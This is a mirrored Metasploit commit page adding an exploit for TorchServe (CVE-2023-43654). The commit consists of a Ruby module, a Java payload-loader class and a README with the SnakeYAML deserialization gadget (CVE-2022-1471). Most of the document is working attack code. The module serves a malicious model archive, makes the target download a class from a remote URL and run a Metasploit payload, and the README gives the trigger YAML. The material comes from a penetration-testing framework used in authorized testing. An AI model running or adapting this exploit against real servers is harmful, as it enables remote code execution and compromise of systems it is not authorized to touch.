mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Initial commit of CVE-2023-43654
This commit is contained in:
parent
874366588c
commit
5a6dc7f9a6
BIN
data/exploits/CVE-2022-1471/MyScriptEngineFactory.class
Normal file
BIN
data/exploits/CVE-2022-1471/MyScriptEngineFactory.class
Normal file
Binary file not shown.
72
external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
vendored
Normal file
72
external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
vendored
Normal file
@ -0,0 +1,72 @@
|
||||
// javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java
|
||||
import javax.script.ScriptEngine;
|
||||
import javax.script.ScriptEngineFactory;
|
||||
import java.io.IOException;
|
||||
import java.util.List;
|
||||
import metasploit.*;
|
||||
|
||||
public class MyScriptEngineFactory implements ScriptEngineFactory {
|
||||
public MyScriptEngineFactory() throws Exception {
|
||||
Payload.main(null);
|
||||
}
|
||||
|
||||
@Override
|
||||
public String getEngineName() {
|
||||
return null;
|
||||
}
|
||||
|
||||
@Override
|
||||
public String getEngineVersion() {
|
||||
return null;
|
||||
}
|
||||
|
||||
@Override
|
||||
public List<String> getExtensions() {
|
||||
return null;
|
||||
}
|
||||
|
||||
@Override
|
||||
public List<String> getMimeTypes() {
|
||||
return null;
|
||||
}
|
||||
|
||||
@Override
|
||||
public List<String> getNames() {
|
||||
return null;
|
||||
}
|
||||
|
||||
@Override
|
||||
public String getLanguageName() {
|
||||
return null;
|
||||
}
|
||||
|
||||
@Override
|
||||
public String getLanguageVersion() {
|
||||
return null;
|
||||
}
|
||||
|
||||
@Override
|
||||
public Object getParameter(String key) {
|
||||
return null;
|
||||
}
|
||||
|
||||
@Override
|
||||
public String getMethodCallSyntax(String obj, String m, String... args) {
|
||||
return null;
|
||||
}
|
||||
|
||||
@Override
|
||||
public String getOutputStatement(String toDisplay) {
|
||||
return null;
|
||||
}
|
||||
|
||||
@Override
|
||||
public String getProgram(String... statements) {
|
||||
return null;
|
||||
}
|
||||
|
||||
@Override
|
||||
public ScriptEngine getScriptEngine() {
|
||||
return null;
|
||||
}
|
||||
}
|
17
external/source/exploits/CVE-2022-1471/README.md
vendored
Normal file
17
external/source/exploits/CVE-2022-1471/README.md
vendored
Normal file
@ -0,0 +1,17 @@
|
||||
# Overview
|
||||
The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded while exploit
|
||||
CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
|
||||
|
||||
## Compiling
|
||||
Compile the Java source file using `javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java`.
|
||||
|
||||
## Usage
|
||||
Trigger the deserialization using the following YAML:
|
||||
```yaml
|
||||
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]]
|
||||
```
|
||||
|
||||
Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The
|
||||
contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's
|
||||
`Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to
|
||||
deliver a Metasploit payload.
|
110
modules/exploits/multi/http/torchserver_cve_2023_43654.rb
Normal file
110
modules/exploits/multi/http/torchserver_cve_2023_43654.rb
Normal file
@ -0,0 +1,110 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'rex/zip'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Java
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::Java::HTTP::ClassLoader
|
||||
# prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
def initialize(_info = {})
|
||||
super(
|
||||
'Name' => '',
|
||||
'Description' => %q{
|
||||
|
||||
},
|
||||
'Author' => [
|
||||
'Spencer McIntyre'
|
||||
],
|
||||
'References' => [
|
||||
[ 'CVE', '' ],
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'License' => MSF_LICENSE,
|
||||
'DefaultOptions' => {
|
||||
'RPORT' => 8081
|
||||
},
|
||||
'Targets' => [
|
||||
[
|
||||
'Automatic', {
|
||||
'Platform' => 'java',
|
||||
'Arch' => [ARCH_JAVA]
|
||||
}
|
||||
],
|
||||
],
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'SideEffects' => [IOC_IN_LOGS],
|
||||
'Reliability' => [REPEATABLE_SESSION]
|
||||
}
|
||||
)
|
||||
end
|
||||
|
||||
def class_name
|
||||
'MyScriptEngineFactory'
|
||||
end
|
||||
|
||||
def constructor_class
|
||||
::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-1471', "#{class_name}.class"))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
|
||||
|
||||
if request.relative_resource.end_with?('.mar')
|
||||
send_response(cli, generate_mar, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
end
|
||||
|
||||
if request.relative_resource.end_with?('services/javax.script.ScriptEngineFactory')
|
||||
send_response(cli, class_name, {
|
||||
'Content-Type' => 'application/octet-string',
|
||||
'Connection' => 'close',
|
||||
'Pragma' => 'no-cache'
|
||||
})
|
||||
return
|
||||
end
|
||||
|
||||
super(cli, request)
|
||||
end
|
||||
|
||||
def generate_mar
|
||||
mri = Rex::Zip::Archive.new
|
||||
mri.add_file('model.pt', '')
|
||||
mri.add_file('MAR-INF/MANIFEST.json', JSON.generate({
|
||||
'createdOn' => '04/10/2023 16:23:53',
|
||||
'runtime' => 'python',
|
||||
'model' => {
|
||||
'modelName' => @mar_filename.delete_suffix('.mar'),
|
||||
'serializedFile' => 'model.pt',
|
||||
'handler' => 'image_classifier',
|
||||
'modelVersion' => '1.0',
|
||||
'configFile' => 'config.yml'
|
||||
},
|
||||
'archiverVersion' => '0.8.2'
|
||||
}))
|
||||
mri.add_file('config.yml', %( !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["#{get_uri}/"]]]] ))
|
||||
mri.pack
|
||||
end
|
||||
|
||||
def exploit
|
||||
@classloader_uri = start_service
|
||||
|
||||
@mar_filename = rand_text_alphanumeric(rand(8..15)) + '.mar'
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/models',
|
||||
'vars_get' => { # *must* be vars_get and not vars_post!
|
||||
'url' => "#{get_uri}#{@mar_filename}"
|
||||
}
|
||||
})
|
||||
handler
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue
Block a user